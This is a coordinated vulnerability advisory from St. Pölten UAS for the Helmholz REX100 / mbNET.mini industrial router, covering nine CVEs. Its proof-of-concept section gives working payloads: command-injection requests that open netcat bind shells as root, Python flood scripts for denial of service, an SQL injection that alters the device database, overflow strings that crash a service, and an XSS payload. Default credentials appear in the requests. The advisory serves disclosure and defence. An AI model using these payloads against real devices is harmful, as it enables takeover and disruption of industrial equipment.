St. Pölten UAS 20250721-0 ------------------------------------------------------------------------------- title| Multiple Vulnerabilities in REX100 product| Helmholz Industrial Router REX100 / mbNET.mini vulnerable version| < 2.3.3 fixed version| 2.3.3 CVE number| CVE-2025-41673, CVE-2025-41674, CVE-2025-41675, | CVE-2025-41676, CVE-2025-41677, CVE-2025-41678, | CVE-2025-41679, CVE-2025-41680, CVE-2025-41681 impact| High homepage| https://www.helmholz.de/       | https://mbconnectline.com/ found| 2025-04-25 by| F. Bruckmoser, M. Eder, J. Heigl, M. Heudorn,              | G. Hofmarcher, M. Kadlec, M. Pristauz-Telsnigg              | S. Resch, P. Schweinzer, M. Gschiel              | | These vulnerabilities were discovered during research at | St.Pölten UAS, supported and coordinated by CyberDanube. | | https://fhstp.ac.at | https://cyberdanube.com ------------------------------------------------------------------------------- Vendor description ------------------------------------------------------------------------------- "Helmholz is your specialist when it comes to sophisticated products for your automation projects. With current, clever system solutions from Helmholz, the high demands placed on industrial networks in times of increasing automation can be met both reliably and efficiently - including a high level of operating convenience. The broad product spectrum ranges from a decentralized I/O system to switches and repeaters, gateways, a NAT gateway/firewall and secure IoT remote machine access." Source: https://www.helmholz.de/en/company/about-helmholz/ Vulnerable versions ------------------------------------------------------------------------------- Helmholz Industrial Router REX100 < 2.3.3 MBConnectline mbNET.mini < 2.3.3 Vulnerability overview ------------------------------------------------------------------------------- 1) Authenticated Command Injection via send_sms (CVE-2025-41674) A command injection vulnerability has been identified in the send_sms functionality of the device. An authenticated attacker can exploit this issue to execute arbitrary commands as root on the device. 2) Authenticated Command Injection via diag (CVE-2025-41673) A command injection vulnerability has been identified in the diag functionality of the device. An authenticated attacker can exploit this issue to execute arbitrary commands as root on the device. 3) Authenticated Command Injection via communication.sh (CVE-2025-41675) A command injection vulnerability has been identified in the communication.sh endpoint of the device. An authenticated attacker can exploit this issue to execute arbitrary commands as root on the device. 4) Authenticated Denial of Service via send_sms (CVE-2025-41677) An denial of service condition has been identifed in the send_sms functionality of the device. An authenticated attacker can exploit this issue to make the device unresponsive until reboot. 5) Authenticated Denial of Service via send_mail (CVE-2025-41676) An denial of service condition has been identifed in the send_mail functionality of the device. An authenticated attacker can exploit this issue to make the device unresponsive until reboot. 6) Authenticated SQL Injection via cloud-status.sh (CVE-2025-41678) A sql injection has been identified in the cloud-status.sh endpoint of the device. The issue can be exploited by an authenticated attacker to read out or modify the sqlite database of the device. 7) Unauthenticated Buffer Overflow via confnet/serial (CVE-2025-41679) A buffer overflow issue exists in the confnet service in the "serial" function of the device. An unauthenticated attacker can exploit this issue to crash the service or gain remote code execution on the device. 8) Unauthenticated Buffer Overflow via confnet/command (CVE-2025-41679) A buffer overflow issue exists in the confnet service in the "command" function of the device. An unauthenticated attacker can exploit this issue to crash the service or gain remote code execution on the device. 9) Authenticated Persistent XSS via cloud-configure.sh (CVE-2025-41681) A persistent XSS vulnerability has been identified in the cloud-configure.sh endpoint of the device. An authenticated attacker can abuse this issue to execute malicious javascript in the victims browser when using the web service of the device. Proof of Concept ------------------------------------------------------------------------------- 1) Authenticated Command Injection via send_sms (CVE-2025-41674) The action send_sms in the file /cgi-bin/cloud-status.sh is vulnerable to a command injection. The following POST request can be used to create the file /hello.txt ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ POST /cgi-bin/api.sh HTTP/1.1 Host: 10.69.43.18 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0 Accept: text/plain, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 74 Origin: http://10.69.34.3 DNT: 1 Sec-GPC: 1 Authorization: Basic Connection: keep-alive Referer: http://10.69.34.3/cgi-bin/cloud-status.sh action=send_sms&numb='test'&text='test$(echo helloThere > /hello.txt)' ------------------------------------------------------------------------------- 2) Authenticated Command Injection via diag (CVE-2025-41673) The action diag in the file /cgi-bin/cloud-status.sh is vulnerable to a command injection. The following POST request can be used to start a binding shell on port 8080. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ POST /cgi-bin/api.sh HTTP/1.1 Host: 10.69.45.3 Content-Length: 71 Authorization: Basic Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Connection: keep-alive action=diag&operation=portcheck¶meter=-l -w 9999 -p 8080 -e /bin/sh ------------------------------------------------------------------------------- 3) Authenticated Command Injection via communication.sh (CVE-2025-41675) The action nc in the file communication.sh is vulnerable to a command injection the following GET request can be used to start a binding shell on port 1337. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ curl 'http://192.168.0.100/cgi-bin/cloudsvr/communication.sh?action=nc¶meter=-l%20-p%201337%20-e%20%2Fbin%2Fsh' \ -H 'Authorization: Basic aGVsbWhvbHo6cm91dGVy' \ --insecure ------------------------------------------------------------------------------- 4) Authenticated Denial of Service via send_sms (CVE-2025-41676) The action send_sms is vulnerable to a denial of service condition. By sending multiple requests, the system becomes unresponsive. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ import requests from concurrent.futures import ThreadPoolExecutor HOST = "10.69.43.18" PATH = "/cgi-bin/api.sh" LENGTH = 512 ATTACKS = 1000 param = { 'action': 'send_sms', 'numb': 'X' * LENGTH, 'text': 'X' * LENGTH, } url = f'http://{HOST}{PATH}' def send_request(i):       with requests.Session() as s:             s.auth = ('helmholz', 'router')             print(f'[+] - Sending Packet NR {i+1}...')             s.post(url, data=param) with ThreadPoolExecutor(max_workers=ATTACK) as executor:       executor.map(send_request, range(ATTACKS)) ------------------------------------------------------------------------------- 5) Authenticated Denial of Service via send_mail (CVE-2025-41677) The action send_mail is vulnerable to a denial of service condition. By sending multiple requests, the system becomes unresponsive. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #!/usr/bin/env python3 import requests from concurrent.futures import ThreadPoolExecutor HOST = "10.69.43.18" PATH = "/cgi-bin/api.sh" LENGTH = 24 ATTACKS = 5000 param = { 'action': 'send_email', 'addr': 'X' * LENGTH, 'subj': 'X' * LENGTH, 'text': 'X' * LENGTH } url = f'http://{HOST}{PATH}' def send_request(i: int) -> None: try:       with requests.Session() as session:             session.auth = ('helmholz', 'router')             print(f'[+] Sending packet #{i + 1} ...')             session.post(url, data=param, timeout=10)       except requests.RequestException as exc:             print(f'[-] Packet #{i + 1} failed: {exc}') def main() -> None:       with ThreadPoolExecutor(max_workers=ATTACKS) as executor:             executor.map(send_request, range(ATTACKS)) if __name__ == "__main__":       main() ------------------------------------------------------------------------------- 6) Authenticated SQL Injection via cloud-status.sh (CVE-2025-41678) A sql injection has been identified in the cloud-status.sh endpoint of the device. An attacker could leverage this vulnerability to manipulate data inside the sqlite database. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ POST /cgi-bin/cloud-status.sh HTTP/1.1 Host: 10.69.35.3 Content-Length: 104 Authorization: Basic aGVsbWhvbHo6cm91dGVy X-Requested-With: XMLHttpRequest Accept-Language: en-US,en;q=0.9 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Origin: http://10.69.45.3 Referer: http://10.69.45.3/cgi-bin/cloud-status.sh Accept-Encoding: gzip, deflate, br Connection: keep-alive language=test%27%29%3B%20REPLACE%20INTO%20con- fig%20%28name%2Cvalue%29%20VALUES%28%27hacked%27%2C%27yes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ A verification shows the manipulated data: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ $ echo "SELECT * FROM config WHERE name = 'hacked';" | sqlite3 /etc/db/config hacked|yes ------------------------------------------------------------------------------- 7) Unauthenticated Buffer Overflow via confnet/serial (CVE-2025-41679) The overflow is located inside the confnet binary. For exploitation the serial number of the device is required. For interacting with the service, the script by syss has been used. (www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-063.txt) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ $ ./cve-2024-45274.py info 192.168.0.100 [*] Getting device info... [+] Received response from ('192.168.0.100', 25353): R50168542 $ python3 cve-2024-45274.py cmd R501685420000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000 192.168.0.100 get_fw $ ./cve-2024-45274.py info 192.168.0.100 [*] Getting device info... [!] No response received within 3 seconds. [!] No response received within 3 seconds. ------------------------------------------------------------------------------- 8) Unauthenticated Buffer Overflow via confnet/command (CVE-2025-41679) The overflow is located inside the confnet binary. For exploitation the serial number of the device is required. For interacting with the service, the script by syss has been used. (www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-063.txt) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ $ ./cve-2024-45274.py info 192.168.0.100 [*] Getting device info... [+] Received response from ('192.168.0.100', 25353): R50168542 $ python3 cve-2024-45274.py cmd R50168542 192.168.0.100 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbb bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbccccccccccccccccccccccccccccccccccccccccccccc ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc cccccccccccccccccccccccccccccccccccccccccccccdddddddddddddddddddddddddddddddddd ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddeeeeeeeeeeeee eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeffffffffffffffffffffffffffffffffffffffffff fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff fffffffffffffffffffffffffffffffffffff' $ ./cve-2024-45274.py info 192.168.0.100 [*] Getting device info... [!] No response received within 3 seconds. [!] No response received within 3 seconds. ------------------------------------------------------------------------------- 9) Authenticated Persistent XSS via cloud-configure.sh (CVE-2025-41681) A persistent XSS vulnerability has been identified in the cloud-configure.sh endpoint of the device. An authenticated attacker can exploit this issue to inject arbitrary javascript which gets executed when going to the "help" page. The impact of this vulnerability is very limited. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ POST /cgi-bin/cloud-status.sh HTTP/1.1 Host: 192.168.0.100 Content-Length: 250 Authorization: Basic aGVsbWhvbHo6cm91dGVy Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqWdUJv1Cc3G8GgCm Accept: text/html,application/xhtml+xml,application/xml; Accept-Encoding: gzip, deflate, br Connection: keep-alive ------WebKitFormBoundaryqWdUJv1Cc3G8GgCm Content-Disposition: form-data; name="langchange" 1 ------WebKitFormBoundaryqWdUJv1Cc3G8GgCm Content-Disposition: form-data; name="language" ";alert(1)//" ------WebKitFormBoundaryqWdUJv1Cc3G8GgCm-- ------------------------------------------------------------------------------- The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.re). Solution ------------------------------------------------------------------------------- Update to the latest version. Workaround ------------------------------------------------------------------------------- Limit network access to the device or remove it if possible. Recommendation ------------------------------------------------------------------------------- St. Pölten UAS recommends Helmholz customers to upgrade the firmware to the latest version available. It is advised to perform a security assessment by a professional company. Contact Timeline ------------------------------------------------------------------------------- 2025-06-11: Contacting Helmholz via psirt@helmholz.de. 2025-06-16: Contacting them again as their PGP setup was broken. Sending them the advisory via secure channel. 2025-06-17: Response from manufacturer mbconnectline. Vulnerabilities are reproducible and are present in latest firmware. 2025-07-21: Coordinated release with PSIRT@VDE and Helmholz. Web: https://www.fhstp.ac.at/ Twitter: https://x.com/fh_stpoelten Mail: mis@fhstp.ac.at EOF S. Dietz / @2025